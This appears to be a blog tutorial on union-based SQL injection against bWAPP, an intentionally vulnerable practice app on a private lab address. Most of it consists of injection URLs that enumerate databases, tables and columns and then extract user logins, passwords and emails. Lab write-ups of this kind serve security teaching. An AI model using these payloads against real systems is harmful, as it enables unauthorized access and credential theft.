If we try to inject a true statement in to the SQL Query we get a true response.
Our next task is to see how many columns are available in the current table. We can do this using 'order by' clause.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 order by 1#&action=go http://192.168.56.101/bWAPP/sqli_2.php?movie=5 order by 8#&action=goAs you can see there are seven columns in the current table. lets move on to finding visible columns to extract data with.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,3,4,5,6,7#&action=goWe see columns 2,3,4 and 5 are visible. This is where we will extract data from the database from. Lets now move to finding out a little more information about the database server.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,@@version,@@hostname,database(),user(),6,7#&action=goWe found the version, hostname and database values for the current sql server. Our next task is to figure out the database schema to learn where the tables and columns reside and their structure.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,count(schema_name),3,4,5,6,7 FROM information_schema.schemata#&action=goFirst we get a count of how many databases are in the database system.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata limit 1,1#&action=go http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata limit 2,1#&action=go http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata limit 3,1#&action=goWe see that there are 4 databases in the schema. Our next task is to iterate through the databases for one we can choose.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,count(table_name),4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database()#&action=goLets first get a count of how many tables are in the database.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 1,1#&action=go http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 2,1#&action=go http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 3,1#&action=goAfter that we can increment the limit keyword and get the rest of the tables we need to extract data from the server
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,count(column_name),4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database()#&action=goWe need to count the number of columns the table has.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database() limit 1,1#&action=go http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database() limit 2,1#&action=go http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database() limit 3,1#&action=goWe got the column count now all there is is to go through and find the columns we want to extract the data from and wrap it in a union select statement.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,login,password,4,email,6,7 from users limit 1,1#&action=goWe have got the columns we want to extract now all that left to do is to input the url and retrive the data returned on the website.
No comments:
Post a Comment